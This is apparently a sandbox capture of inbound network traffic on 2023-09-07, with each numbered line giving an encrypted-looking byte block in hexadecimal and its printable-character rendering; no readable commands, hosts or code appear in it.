2023-09-07 07:31:07 UTC	20	IN	Data Raw: a7 f4 b2 f5 cd c3 89 49 5c 06 0b a8 0e 1d e4 c6 a9 f8 cc b9 96 d0 a9 70 5e 05 8c 50 01 1d 9c 0e a8 4a 64 4a 0a 63 5e b2 15 c1 a2 5e f0 da 77 0e a4 26 8c 95 16 20 92 59 80 8e c3 13 7f 57 3d 89 97 ad 74 ca 5d 0a b2 38 8f 7e 9b 73 7d f8 4b 32 52 1b c7 5d 46 e4 97 20 87 ce 92 37 a3 23 68 fc 12 5e 07 4e c4 0e 94 29 20 47 ef ab 44 fb 2a 21 10 ec 4c c4 2b e4 68 fa 00 d3 bd ae bc f1 ad 1f 88 35 06 eb 45 4c e9 cd cd 4f fc 36 40 01 bb 87 17 a7 64 45 df 76 ee a5 d1 ba 77 bc f4 c6 76 47 93 6a 16 ee 43 cd fc 62 31 79 4a ad 45 ef f0 da 81 db d9 d0 a4 b9 09 c2 2a 69 04 54 2b a2 d5 74 f3 6c a5 1f 65 c8 38 d0 d5 dc ec 8a 75 e6 e6 b3 98 fe c0 2d df 8b a5 d7 eb d8 85 89 f0 db 63 a4 4b 6a b0 42 5d bf 6d dc dd 3b 99 41 19 d3 4b 00 ae 7d 46 89 53 5d 72 fc 13 09 de 5a 1d e9 3e Data Ascii: I\p^PJdJc^^w& YW=t]8~s}K2R]F 7#h^N) GD!L+h5ELO6@dEvwvGjCb1yJEiT+tle8u-cKjB]m;AK}FS]rZ>
2023-09-07 07:31:07 UTC	21	IN	Data Raw: 00 6d a1 fe ef 4d 32 a2 a0 7e a1 c4 bb 9b 87 ab 26 d4 a6 87 55 6d 4c fb c5 3b 8a fc c5 17 8a 55 23 bf 96 83 f0 db 21 a9 14 db ff d4 71 da ad 6e 5c 48 4f f3 51 13 e4 0c c8 34 0d 8c cb eb a3 16 5f 3c fe 5c e3 cd cd 5d 0e 22 03 76 c2 a3 69 bb 9c 04 24 f7 f6 90 91 58 5e 25 11 fa cd 28 71 8e af 43 cc 54 f0 c2 4a b1 e8 3b 65 6f 78 90 a6 bb 51 af 21 f8 35 4e 3c f2 76 b3 48 83 90 59 5b 54 8f 2c 35 15 de 2b 93 42 81 c5 7d 71 ac f9 bc 4a 72 6b 0e f4 3e 8c f6 e9 5c 10 68 c8 52 27 03 03 9e 01 4a 97 03 ff 57 ae 1b aa 60 e5 6f 65 c2 32 03 8c 6a 37 c6 29 dc b5 30 bb 79 b2 25 a5 aa 7d dc 93 3e e5 27 ef 33 f4 54 18 f5 e3 e8 36 80 42 6d 25 cf ba 62 9f 8e c1 18 95 40 26 19 a8 5a 5a f8 82 d0 8a bd be 4c 83 d4 17 60 50 2b aa c0 2d 2b 39 30 bd 73 6b c4 b1 12 5c 7b 64 0f b3 9e Data Ascii: mM2~&UmL;U#!qn\HOQ4_<\]"vi$X^%(qCTJ;eoxQ!5N<vHY[T,5+B}qJrk>\hR'JW`oe2j7)0y%}>'3T6Bm%b@&ZZL`P+-+90sk\{d
2023-09-07 07:31:07 UTC	22	IN	Data Raw: 2e 94 4d 17 af ed a2 a6 fe 9f d7 cd e1 eb fd 3c 68 13 f6 08 3a 30 a2 a2 3f c6 b7 13 09 90 16 a4 36 77 6d 8e 0d 05 ce 2b ba e5 b4 fb ab e5 2e 2a a5 34 05 c9 63 7d 9f f1 df 4f 96 b2 b3 5c 4f 4b 38 a9 ef 4e b3 14 34 13 91 1d d1 42 25 90 a3 d1 e9 e3 3f 18 4d fc c8 1e 39 a0 73 54 91 4b 1c e7 50 d6 1f f3 e8 f3 cb a3 0b 81 a8 0f 1b 10 56 ab d0 c7 eb 23 a7 c5 51 d0 20 9f 08 3b c6 26 00 f8 cf 4a 96 dd 1a ed 03 83 6c 45 4d 06 e9 b7 d1 6c c8 e9 e6 fc 89 d4 02 f0 52 4f f1 70 20 3c 07 86 45 3c 96 cf 4c 99 61 63 3e 76 f8 3d 7a 03 fb fc 54 21 7e c3 25 8e c9 bc b6 6e 00 fc 19 b0 9a 67 f5 17 06 75 ff e5 d0 49 8d c3 6b 88 a9 4e cc 44 c6 a6 82 1a b0 ab 5b 8e 12 18 2c f1 b0 e3 94 82 62 ea 61 ca c9 e2 e6 46 ac 96 57 db 59 67 b7 8a 7f 41 7a 7e 28 44 6c cd a2 6a 03 36 f4 13 65 Data Ascii: .M<h:0?6wm+.*4c}O\OK8N4B%?M9sTKPV#Q ;&JlEMlROp <E<Lac>v=zT!~%nguIkND[,baFWYgAz~(Dlj6e
2023-09-07 07:31:07 UTC	24	IN	Data Raw: bb bf 6d 7b 7a 15 eb d1 ff f7 27 f1 69 e9 ab 59 87 9b 25 d9 69 56 c6 0d 0d ec 16 23 e2 b8 93 5b d0 06 25 bf b5 5f 55 ed 75 86 e7 b9 2d 3a 5b a5 90 36 0e 7e a8 33 44 95 cd 9f bf fe da 6f ef ff 1f 61 02 23 7d 3c 0c ea 32 5e d6 68 ce 11 5a e5 a9 a3 22 eb e5 1e ba 69 d6 18 f4 31 e8 2b 7c 62 3b 80 42 7e 03 d4 3f a5 f6 8b 95 e8 e2 31 49 b6 f3 42 f3 64 2d 49 dd c6 74 a9 e9 19 52 54 93 ce 1c cf bd 7b 8a 64 6b 1f 53 4a 0d 53 3e 8e d8 51 fc 1a 7c 0b 3b cf 8b 8a a5 25 3a 8d d8 c5 01 1f 57 67 75 60 78 9f ea e6 a3 15 17 5e ab 2b 99 30 9e 17 7a 75 46 9b c5 2a 36 a0 11 26 bd e8 6e 03 15 c5 9e 0f 96 d4 1d 19 30 e9 dc c2 e4 8c 64 42 05 f1 f5 61 90 9e 85 20 72 09 1e 84 28 31 25 fb 13 43 80 6f 59 52 ed 46 72 0f 4e 40 42 24 69 94 12 dd 9c f5 42 29 e7 c1 ef 55 40 fa df 44 62 Data Ascii: m{z'iY%iV#[%_Uu-:[6~3Doa#}<2^hZ"i1+\|b;B~?1IBd-ItRT{dkSJS>Q\|;%:Wgu`x^+0zuF*6&n0dBa r(1%CoYRFrN@B$iB)U@Db
2023-09-07 07:31:07 UTC	25	IN	Data Raw: 53 a7 7a 09 b3 c1 69 7d f9 4d 06 c1 bf 4c 96 43 66 4d ed 15 12 f6 98 3d 03 64 cb 1a a8 87 e1 5f 29 93 5b 1c 2b 40 b5 f6 2e 69 18 c4 ff 6c df 94 8a f1 80 95 cd 3f e0 4a 70 db 63 fe 67 04 fe a0 a5 f1 e4 43 8e 2c 26 92 31 59 66 a4 7c 52 51 fc f8 9c 59 27 2e e0 19 cb f7 48 b2 67 73 a0 79 98 ac 5f cd f1 db a5 4f a5 55 92 af c4 40 0f ce f6 8d 5f 95 e4 ff de 08 06 bc d7 73 75 ad 1e a3 a2 17 54 70 c9 cb 07 a2 e5 ea 75 7f 44 fa 87 29 66 66 d9 35 6f ca ae 89 f2 83 ea 41 68 5d 4b 6a 2c fa 61 50 96 59 20 82 84 3d f4 35 d9 ce 54 12 82 6d 14 23 9d 97 49 65 4a 68 21 f3 79 0e c6 99 28 28 14 84 0a f0 00 e9 77 41 8f b7 79 8d b3 60 a6 db 9c 5e aa 57 a7 f3 cd bd a8 60 64 8f 2d 00 11 07 42 ee 9d ef 64 a0 7e 1d f5 64 b6 9a b6 f2 cb fa 29 d0 69 4a 40 05 04 5a fa ff 17 c2 42 76 Data Ascii: Szi}MLCfM=d_)[+@.il?JpcgC,&1Yf\|RQY'.Hgsy_OU@_suTpuD)ff5oAh]Kj,aPY =5Tm#IeJh!y((wAy`^W`d-Bd~d)iJ@ZBv
2023-09-07 07:31:07 UTC	26	IN	Data Raw: b1 30 6f d4 06 65 29 67 aa ec 2f 38 23 32 be 1c ca ca af ea 4b 38 85 24 b6 ac d6 0a 26 24 ad 6b aa ee fc c6 a8 04 12 80 22 b3 96 4c 68 ca 02 f9 45 0e 70 7d 35 38 34 15 5d 33 4e d3 32 ea 3d c6 13 01 10 0f cf 20 6b bd 94 5d 5f 49 5c 4c a7 ed 1f d8 19 d9 2c ed 16 a0 cc 88 f3 15 2e 9d 1a 96 5d 69 b8 a9 eb a6 6c c9 89 3d 22 ee 73 11 06 53 8d be 17 f5 cb d2 ce a9 5d 06 07 aa 1a 64 61 c3 82 c4 cc ba 90 8d 20 7b 47 22 87 b3 fc 1e 8a 88 54 b5 9d 34 6a 74 06 ab 0e f0 99 a9 08 0e 36 53 cd d8 75 05 61 33 83 8d 9c 56 b1 c8 53 53 3f 91 ad 7d 65 de 5b 78 a1 7c 82 7b 8a 77 f3 91 79 ad 55 19 ef 87 47 e4 91 02 bc 28 78 67 8b 41 6a fd 14 76 66 11 c6 20 9d f7 29 6b 9e 0f a7 06 ca 76 e6 8e 47 ee 2d cc c4 fb 10 d5 97 b0 be 97 21 8e 26 31 25 c8 47 4f 95 1f cf 67 fc 1c 40 0b b9 Data Ascii: 0oe)g/8#2K8$&$k"LhEp}584]3N2= k]_I\L,.]il="sS]da {G"T4jt6Sua3VSS?}e[x\|{wyUG(xgAjvf )kvG-!&1%GOg@
2023-09-07 07:31:07 UTC	27	IN	Data Raw: f4 d8 8d 64 96 57 d1 6e 60 a8 63 26 7e 7b 1c a4 55 6b 49 c1 40 8d 26 de 5c 71 2f d0 9b eb 96 b9 51 ee 69 95 cd 54 2f b6 26 9f ca c8 ba 4c f1 d2 d9 f5 45 cd 34 0b 59 e6 49 d0 9e e4 86 47 91 71 7a 37 9c 07 0a 5e 3c 35 d1 a6 0b 7f eb e5 8c d0 a4 17 f8 ad f7 ee 1d 54 de 9b f2 3c f8 90 37 a5 2f ad 05 63 9f 20 51 53 45 0c 81 0c f0 c0 ad f7 09 1e 34 e8 fc 48 00 49 b3 74 a1 d5 a0 8f 61 54 0b f1 be f2 c0 6a d6 fa d2 31 93 f3 d4 0c 9f b1 dc 92 b2 9f d8 c5 3d 81 39 c8 f5 de 40 13 54 7a 07 4c 2b e7 42 12 d6 19 c2 34 16 ae 74 15 a2 30 34 96 e9 4f e3 d6 cf 58 12 cd 0d 41 3e 89 47 b0 15 6d ea c1 f6 9a 97 70 bd aa 1c a0 e5 40 7b e1 41 6b ca 5e fd c1 75 e4 01 3b 6f 49 48 64 b5 b4 5b a8 41 0d cb 4f 1a b9 9a ac 52 a1 b5 51 63 fb af 29 d5 ee 8c 6c 1a 40 81 c9 21 13 ac f9 b7 Data Ascii: dWn`c&~{UkI@&\q/QiT/&LE4YIGqz7^<5T<7/c QSE4HItaTj1=9@TzL+B4t04OXA>Gmp@{Ak^u;oIHd[AORQc)l@!
2023-09-07 07:31:07 UTC	29	IN	Data Raw: 7e 77 46 78 07 01 b6 bd ce 39 d3 0b de 9c f5 7b 97 f6 c7 86 6a 5e f8 ae a5 1b 3b 0c 82 eb af 10 30 7d 1a 16 13 cc 55 ba 63 26 ca 56 d9 a5 95 1a 07 a0 08 e1 51 d7 fa 26 bd c7 d9 b7 43 5d 13 b2 28 71 6e ae 6d 35 29 b6 0b 3c 86 6f 8f 80 82 42 ab be 88 96 f5 67 96 a1 f9 28 83 3b 97 37 53 dc 8f 0e ac ae ac ad 38 8a 72 11 fa 88 ee 26 06 7b cf dd 4d 11 ca 7a a2 59 1e d4 f9 87 81 ea fb 2d 14 50 e7 00 18 58 a5 cd 8c eb f3 08 0c b0 66 af 20 6e 4c 8d cf 0f e2 1c a2 9d d1 f6 31 ee 43 69 b4 3f 1e e1 20 ff 74 ab f1 3c 9f a3 bc 3a 1e 4c 38 af f4 52 cd 57 5b 68 9a 0e d3 7b df 92 8b 4b f8 e7 19 20 c5 17 92 30 4a a9 1c c4 fe f1 16 39 59 84 c8 f3 f9 ef b3 de 18 86 b3 1b 0f 04 3d 17 b6 38 07 6e d6 99 a9 2e d9 0f a3 34 d1 74 67 fe de 45 9c c0 92 95 38 4b e7 45 58 55 eb d5 d3 Data Ascii: ~wFx9{j^;0}Uc&VQ&C](qnm5)<oBg(;7S8r&{MzY-PXf nL1Ci? t<:L8RW[h{K 0J9Y=8n.4tgE8KEXU
2023-09-07 07:31:07 UTC	30	IN	Data Raw: 0a 42 77 6e 7b 77 a3 a8 3b ea d8 f4 3b d4 4f 9f be 04 22 42 fd 81 eb d3 4f 6d 9d 98 83 08 cc 6e 11 0f a4 ed d3 90 97 e9 ba 8a f0 53 bb d6 a7 78 a8 cf 4e 90 22 f0 2c 8e fe 4e 38 b4 18 b6 06 e2 e2 7b 62 13 7f d0 ce c1 83 a7 8c 11 0c 12 6c 67 11 3c 6c 6a eb 88 b6 75 97 32 69 cf ff 61 5c 20 c6 ad 0f c3 ba 81 c8 46 df a8 81 55 8b 52 ab 8b 27 bc 41 7f 3e ad c0 52 fd a3 ce 09 83 b2 8f 33 ad f8 23 b6 97 7a ce 01 0d ee dd c5 e9 80 9b 52 c7 8b 23 b5 a4 55 dc e9 6d e0 04 a6 0d ad 59 a0 e9 1d 03 46 43 3e 4d 8d 46 80 aa d3 b4 7d eb ee 68 65 b2 23 77 25 29 36 80 56 66 1a 84 71 58 e3 87 9f 78 09 05 57 97 1a d1 30 f5 11 4e 3c 50 77 13 e2 40 0d e3 c5 3a be e0 e2 e9 ee f3 3e 37 55 db 5b f9 75 2d 4f f4 ca 9f f3 c1 08 3b 54 95 ab f9 c9 9d 03 07 63 31 37 3b 5b 0a 44 18 2c 0b Data Ascii: Bwn{w;;O"BOmnSxN",N8{blg<lju2ia\ FUR'A>R3#zR#UmYFC>MF}he#w%)6VfqXxW0N<Pw@:>7U[u-O;Tc17;[D,
2023-09-07 07:31:07 UTC	31	IN	Data Raw: 1f 69 fb 16 bc c4 af bc ea a5 ae be ce e5 b0 6d 2e ea 93 c9 08 8b 36 40 01 95 96 49 69 aa 1f f7 1e e4 85 6f 69 19 e6 dc a2 5e 59 97 31 4a 15 a9 93 fe 22 31 7a 31 01 be ee f4 f6 a9 41 d9 cb 9e d2 2c bd 2a 63 6b 35 2a a2 c2 49 d2 60 ae e0 9e 33 66 ee 49 df c0 88 1a 82 f5 b7 92 c3 e4 33 29 aa 72 2e 2a 80 86 03 ed fd 4d b2 50 91 50 38 18 3b 85 86 f3 71 60 40 1f fd 22 7b af 77 4a 9f 4b 5d 83 fc 13 05 91 80 fb 03 62 c8 55 d9 7a 0b 03 29 92 59 1c 27 02 5c ff 41 19 0a ce 8a 30 bd 94 8c e8 a1 90 c8 41 95 24 0d dc 4b 9b 76 08 e5 87 cd 8e ec 2c 1e 3d 2a 8b e4 4b 48 15 0e 43 57 e1 80 95 a3 dc 72 d9 7e 47 9e 71 7f 50 8c 5f ad b2 c8 48 d9 d5 2e 68 a3 d5 64 e3 aa c4 57 19 d1 67 fe 73 9c 9d 5b ec f4 e6 ec e7 02 70 ad 09 84 7a ea 40 f9 e5 a9 12 b1 e4 85 12 78 5d 0e a6 3c Data Ascii: im.6@Iioi^Y1J"1z1A,ck5I`3fI3)r.MPP8;q`@"{wJK]bUz)Y'\A0A$Kv,=KHCWr~GqP_H.hdWgs[pz@x]<
2023-09-07 07:31:07 UTC	32	IN	Data Raw: 4f 10 d7 63 aa 43 ad b7 5d 7b 57 5b c3 8f d7 e6 01 f1 46 ee 79 55 77 a6 8d bf 62 db 6a 1f fb 79 f2 f6 e9 50 1e 7c d6 56 16 15 ee 8a 5a 4e d5 1e e3 79 f7 a1 aa 6a cf b9 8c 28 68 2a fd 60 26 c5 21 ee 41 da eb 79 ea 27 a5 a6 40 57 a9 16 1e cd a4 14 8b a8 19 df c8 a7 ad c1 18 45 4d de b1 7a e3 7f c1 09 90 f2 f9 18 84 52 01 ab 82 d0 8a 9f b8 5f 8c de 15 6a 57 d2 83 8f 29 2b 24 0f 93 62 72 e3 cc ec 5d 5d 4b 3c 96 f9 4d 50 7d 0c c9 71 c5 0b ed ce 8a 6b a1 81 28 9d 84 43 79 ce 00 f8 27 77 59 c5 32 2b 3b 17 5b 33 41 94 2c eb 3d ca 2f 48 10 06 88 3a 6a bd 98 61 61 5e 28 57 dd ec 19 cd 18 c1 1c 86 eb 25 eb a1 91 11 3f 8b 64 eb 33 10 bf af fc be 13 4e 86 52 53 31 7f 06 13 6f 88 87 b4 9a df d4 a1 d4 80 17 0d ac 52 18 fb d2 8e df d6 33 ee ea 86 82 a9 da 48 bc e3 6b b2 Data Ascii: OcC]{W[FyUwbjyP\|VZNyj(h*`&!Ay'@WEMzR_jW)+$br]]K<MP}qk(Cy'wY2+;[3A,=/H:jaa^(W%?d3NRS1oR3Hk
2023-09-07 07:31:07 UTC	33	IN	Data Raw: f7 5e c4 85 48 7b 36 d1 78 3b 20 de 45 81 f9 8a 86 47 ff 91 ba b6 25 e1 b5 d2 10 40 e9 e6 f8 a3 66 03 fb f4 7e f1 71 e1 3d 06 86 79 1c 94 18 bc 88 68 5a 8f 77 f9 63 78 3a f5 e6 aa 2a 50 e6 1b 45 38 f5 94 0c 13 f6 08 66 0e 4b fc 62 a8 6b fd 94 5d 51 9e cd 41 bb a1 55 4f c2 ea af ae e9 b0 ab 5d 9e 3b 0d 26 66 a3 e9 8d 5d 63 Data Ascii: ^H{6x; EG%@f~q=yhZwcx:*PE8fKbk]QAUO];&f]c
2023-09-07 07:31:07 UTC	34	IN	Data Raw: c6 7c db b5 f3 df e2 a6 80 67 d5 52 62 aa 74 6f 67 68 f3 ad 7d 21 c6 a8 72 17 4f 5f 02 73 0d c7 93 d3 83 ba 71 e6 85 77 bf d1 4d b4 2c 95 ea 53 76 4c f7 f2 ca fe 13 48 32 18 5a 11 2a d3 9d 99 02 50 b9 73 50 37 b7 34 32 5b 3c 9a dd d5 81 53 eb e3 8e c2 a6 19 c9 aa 79 ef 1d 52 de 95 85 06 f9 bc 37 e2 5c ad 05 6f 9f 2f 70 f5 4f 0c 90 14 ee 16 6a db 00 67 a3 ed fa 31 7e 50 a0 78 b2 c2 bb 92 8e 51 36 fd c0 33 d1 6d 46 d1 d5 d7 73 a9 ed 64 87 4f db d1 72 a7 f6 ce 1d a0 d7 31 a5 f6 33 1b 4d 82 17 64 3c f4 3e d2 cc 0a c2 14 2f 51 88 b1 8b 7e 32 96 f8 33 21 d6 de 58 26 2d 0c 6d 36 cd 38 9a 83 18 1d c7 e7 94 8a 7d d5 02 fb a0 ef 6a 4f 7b 43 31 e2 36 f2 c8 64 e4 20 3b 6f 49 48 f5 b4 b4 57 af 28 f5 cf 5e 15 b9 b7 ac 52 a1 86 19 ae b4 f5 01 b7 fd 84 05 9e 88 81 c3 5f Data Ascii: \|gRbtogh}!rO_sqwM,SvLH2Z*PsP742[<SyR7\o/pOjg1~PxQ63mFsdOr13Md<>/Q~23!X&-m68}jO{C16d ;oIHW(^R_
2023-09-07 07:31:07 UTC	35	IN	Data Raw: 54 80 69 f1 61 64 48 72 14 2f 7a 5d da 62 d7 65 cd 97 e2 59 a0 9f f5 16 5f 60 e9 db 2b 0a 35 17 b4 37 ac 3f 58 e2 16 3e 19 e7 55 ab 7b 22 ca d5 d2 9c 68 d7 f8 5f 06 ea 51 d4 c2 44 b2 d1 27 b6 7e 54 0b 5b 3a 46 2f be 63 2a 73 00 0a 10 8e 64 6e 47 c5 e4 7c 23 8c bc f3 70 f9 fb c9 2d 89 94 9e 31 40 e8 52 40 bc b8 bf 75 09 c2 75 02 f0 55 bc 21 1c 85 b0 b9 47 12 af 4c a2 a6 fe 85 ca f6 85 ea ec 3c 64 12 19 01 3e 59 b3 a6 22 b2 e0 06 1f b4 66 a2 36 6c 46 aa 0d f1 e3 30 be 9f c6 e2 f2 dd e4 21 b4 3f 0b d3 1f 06 9e e0 df 41 8d 5d bb 1f 3e 43 2f f7 f3 5a b3 0d 5d 68 81 1b c8 5f d0 93 a7 4e f8 e7 28 72 63 eb f4 d6 28 ab 1c dd 9c 58 10 39 42 f6 d8 0d f8 d8 db f9 96 ef b3 12 19 13 39 26 d7 df 13 35 d2 ea 8b ef 29 8a 43 1c b3 7c 13 f1 20 4e 86 d3 8d 97 3a 6b 80 bc af Data Ascii: TiadHr/z]beY_`+57?X>U{"h_QD'~T[:F/c*sdnG\|#p-1@R@uuU!GL<d>Y"f6lF0!?A]>C/Z]h_N(rc(X9B9&5)C\| N:k
2023-09-07 07:31:07 UTC	36	IN	Data Raw: 89 c5 30 fa 10 7d 6c 1d ee 65 bc b2 cf f3 e7 e7 2a cd 56 08 57 05 0e 48 e6 ff 09 c2 59 78 8d 59 89 0a ad 56 00 01 b6 00 db a3 8d e5 b4 a2 d7 41 a4 d6 52 60 97 ca 5f 8d 3d e4 48 9c d4 48 34 87 d5 4e fd aa dc e7 61 3f 7d f8 c5 d2 91 ad ee 46 13 30 98 6a 27 2d 49 6f c2 60 51 74 69 19 46 d2 e5 7e 4f 44 c6 bc 01 95 44 80 f5 54 cc bb b9 77 8b 52 a1 80 27 bc 41 73 35 31 e2 c4 50 ab 4c f3 69 ee ad 49 bc fc 25 c8 67 6c 30 0a 32 e0 cb c1 f1 bc 93 42 c3 93 cc be 99 5c 6d e6 4f 5d f3 aa 1b aa 61 8d f7 07 61 9a a2 3e 47 86 51 8b a4 c7 4f 46 54 ff 6c 00 8e 34 77 2f 08 e2 9d bc 3c 38 ec 7a 4f bd a2 8a 70 66 19 44 92 01 e6 ce 2c 12 68 e8 69 c1 39 e2 40 7f 15 c5 3a b4 f3 d7 f8 da 87 3b 5b b3 db 5b f2 3a 29 47 f9 32 75 a3 eb 4a 4f a2 79 9e 27 ab 9f 09 6e a6 d3 37 31 4e 27 Data Ascii: 0}le*VWHYxYVAR`_=HH4Na?}F0j'-Io`QtiF~ODDTwR'As51PLiI%gl02B\mO]aa>GQOFTl4w/<8zOpfD,hi9@:;[[:)G2uJOy'n71N'
2023-09-07 07:31:07 UTC	37	IN	Data Raw: e6 52 63 3c e4 68 fa 03 d8 ac a5 aa f3 f1 13 37 3e 60 cc 45 4c e2 bb 26 67 f8 30 53 0d a8 a1 6c 5b 9f 1b e6 12 fb 28 c0 92 f3 bd e7 cc 4d 55 fe 37 92 ee 49 a6 ad 41 33 7c 1c 33 54 eb fc f9 ee 1c d9 cb 9e ac 0c d2 e2 69 04 44 03 4a c4 62 e6 07 f5 08 65 df 2e ce 03 c4 c1 8e 7f cb 32 49 67 10 1a 34 33 82 77 c3 d7 da ae 7a 80 e9 4b 92 41 b6 ab 66 32 71 62 86 f5 5f f4 36 1e fb 4b 11 aa 18 34 97 49 73 6c 9f 13 03 f4 da ec 12 60 ae 40 a0 7b 0d 2d 62 f1 59 16 00 27 7b e7 2a 0c 9d ce 8c 12 cc 93 a4 29 8c 84 cb 14 ba db f2 25 bd f6 64 0f 11 bc c7 88 e5 58 e7 29 2a 81 30 94 b0 c8 28 8c 51 f0 f2 86 a5 8c 38 c8 7b cb f7 4e dd 6e 73 a0 73 f4 ef 4e ca d1 f2 59 a5 f1 7d f0 ad c4 46 1e c6 9b ff 5f 95 77 df ec f4 58 e7 ff 11 3a af 18 83 62 14 41 d5 e1 a9 05 a2 e3 85 03 7f Data Ascii: Rc<h7>`EL&g0Sl[(MU7IA3\|3TiDJbe.2Ig43wzKAf2qb_6K4Isl`@{-bY'{)%dX)0(Q8{NnssNY}F_wX:bA
2023-09-07 07:31:07 UTC	38	IN	Data Raw: b4 37 fb d7 67 26 d6 70 a6 72 b7 56 b3 01 76 cd 2b d5 f9 ac 05 f1 40 8b 61 48 64 a3 f9 a7 6d c4 70 f0 ff 7d 29 e7 e7 47 00 f5 ae 6d 46 f2 e5 9f 1f 7a a4 13 e3 6e 97 04 a1 94 c4 e1 8c 10 74 d4 11 97 28 cc 12 d5 b5 21 be 4a 76 24 89 85 40 59 91 0d 02 d7 14 66 c1 c8 1b d9 ee c6 44 2b 42 67 0f d9 41 96 d6 a9 a3 0b 9a 51 f0 1e 84 53 23 f6 9e c3 8f b7 b7 50 93 cd f8 6e 6a f9 ad fd 2f 0b 0e d2 58 29 52 a9 ad ec 5b 46 61 0c a8 a6 b9 b0 36 2c ba 7a c7 25 10 c6 a2 6d d3 f4 23 b5 83 2d ef c4 13 f5 4b 19 4b ca 34 29 3d 19 4e dc 45 d7 5b fb 31 db 66 52 0d 1f fa 50 64 bd 8f 7f 70 b1 2e 14 ad f6 94 c2 09 c8 3d ef 15 d6 a2 86 f3 02 30 92 11 62 33 3c b3 b8 e3 a0 24 cb 88 4d 42 fc 7c 17 06 4c 90 81 4e f4 e7 f6 b0 da 7c 07 f0 51 50 23 95 c1 82 c8 fd ae 76 3f 69 54 34 27 96 Data Ascii: 7g&prVv+@aHdmp})GmFznt(!Jv$@YfD+BgAQS#Pnj/X)R[Fa6,z%m#-KK4)=NE[1fRPdp.=0b3<$MB\|LN\|QP#v?iT4'
2023-09-07 07:31:07 UTC	40	IN	Data Raw: c7 e7 1c f9 fb ab 24 e6 4d 18 34 d1 76 1a 6d fe 9e 74 39 ce ac 5e 69 91 bc 9a 09 c3 b7 db 45 18 e9 e6 f6 9a 62 12 ff fc 42 e1 62 2d 04 fb 86 45 1c 85 05 bb 96 f8 71 3b 67 fc 43 8f d8 15 a6 7c 49 7e e3 1b 00 50 e6 9e 06 3b 26 1f 98 0f 76 f0 08 a1 7c fd 9e 56 5a 83 d6 4f d9 ba 4c b1 c9 ee 5e 87 30 b6 b8 5d 84 24 06 b6 71 3f f4 94 a3 63 f9 7f cd d5 9b e6 e2 ac 9c 41 41 5b 76 b1 72 66 f7 64 80 bb 44 6c c6 bb 62 01 30 9b 3a 73 07 de 8c 71 8f b3 60 e0 81 e5 80 f1 5a b4 26 98 f1 6a ab 5d 98 de c7 f7 34 53 3d 1a 5b da f1 f2 61 6a e1 1d b9 17 52 37 9a 34 c2 5a 3c b7 c3 ac 1a 58 65 8c 8a f7 b1 0c ca d2 6d fd 14 45 c8 fe fc c2 f9 b6 2b 73 9b bc 0d 0a 9a 26 48 4a 59 f2 92 59 cb 7f aa a8 74 6c b0 ee ef 49 1b 5a b1 77 ce b9 ab 94 99 44 2c e9 a7 dc 26 6d 4c f7 a1 5b 98 Data Ascii: $M4vmt9^iEbBb-Eq;gC\|I~P;&v\|VZOL^0]$q?cAA[vrfdDlb0:sq`Z&j]4S=[ajR74Z<XemE+s&HJYYtlIZwD,&mL[
2023-09-07 07:31:07 UTC	41	IN	Data Raw: 73 45 64 2b 65 ec 35 55 bd 25 80 63 7c f1 c6 0f cf f2 ce 68 8e 3b 17 14 84 e7 0f 36 6e 39 bb a0 5d d6 09 3b c3 b3 dc 1e 31 9f a3 92 5d 01 19 4c 0e 41 66 17 f8 c2 7c a9 04 19 19 97 2b 99 3c ab 19 7a 75 46 9b c5 2a 3b a0 1c 17 27 2b b3 95 d7 fd b4 6d 92 bb 66 77 f7 ef cd cf c6 9c 31 a8 5f df f8 14 91 98 ec f9 75 21 30 eb 55 3a 34 f8 6d 5c 91 68 73 2c bb ac 28 2d 43 67 42 22 0c 3c 69 dc 96 d3 34 e2 1c 9d a8 22 42 fa d3 44 d3 3b 08 a2 a6 d4 12 4d f5 0b 1c 06 ee 3a da 52 25 cc c4 d2 85 e1 e6 ed fa 31 95 40 da c4 3a cb c6 d9 b1 43 5a 18 45 38 41 40 d7 6c 35 51 d6 68 3c 8c 45 46 69 79 11 ec a6 8b 96 f5 58 9a e8 f9 22 a4 1e 99 20 49 b9 c4 40 ad a4 72 70 17 72 74 10 fe 7d 1f 27 06 71 8b 46 b3 ee 3f 84 ac b4 fa 70 c7 ed 83 ea e6 55 6f 19 e7 0a ce 55 88 b8 26 e4 f3 Data Ascii: sEd+e5U%c\|h;6n9];1]LAf\|+<zuF*;'+mfw1_u!0U:4m\hs,(-CgB"<i4"BD;M:R%1@:CZE8A@l5Qh<EFiyX" I@rprt}'qF?pUoU&
2023-09-07 07:31:07 UTC	42	IN	Data Raw: 81 96 c8 01 ec 2a e0 f7 fa 3d 70 bc 1d ec 78 14 41 df 3d b8 0a b5 bb 96 0c 6e 4b e1 a9 9e f3 b3 e2 e0 f2 37 bf 82 cd c5 f9 4c 73 41 51 09 68 93 5e 6e 79 b2 f7 97 87 1b 20 0f 9f 1b ab ed 5c 22 4a 37 63 81 44 65 4a a4 4e e7 79 62 ce 45 2f 4b 57 78 e0 a9 28 8b 75 40 89 9f 7e 8f b3 6a 8e c0 9c 5e a0 35 a8 e5 de fb 93 dc 64 83 2d 11 16 68 8f ee 9d e5 0b 6e 7e 33 ff 77 a3 e8 32 f2 cb 82 38 c5 41 86 40 05 0e 48 f5 ee 19 c0 7f 61 b0 ab 98 1b c2 22 00 01 ad 05 df 97 fb f6 af ba 38 52 97 cc ae 76 bc d7 4c 0f 45 fe 8b a7 f2 56 3f 9e de 43 ec b1 dd e7 61 3f 74 fa 5c a8 94 f4 72 4b 0c 12 67 60 13 22 62 63 e0 78 ac a7 87 18 7b 44 c2 7d 4f 2f ca b4 6e f3 44 80 ee 48 c4 b2 92 52 92 bd a4 bb d3 ba 7b 55 bd ae eb d7 ff 99 23 f1 60 fe 59 50 83 fb 25 ce 6e 7a c7 10 e0 e5 e7 Data Ascii: *=pxA=nK7LsAQh^ny \"J7cDeJNybE/KWx(u@~j^5d-hn~3w28A@Ha"8RvLEV?Ca?t\rKg`"bcx{D}O/nDHR{U#`YP%nz
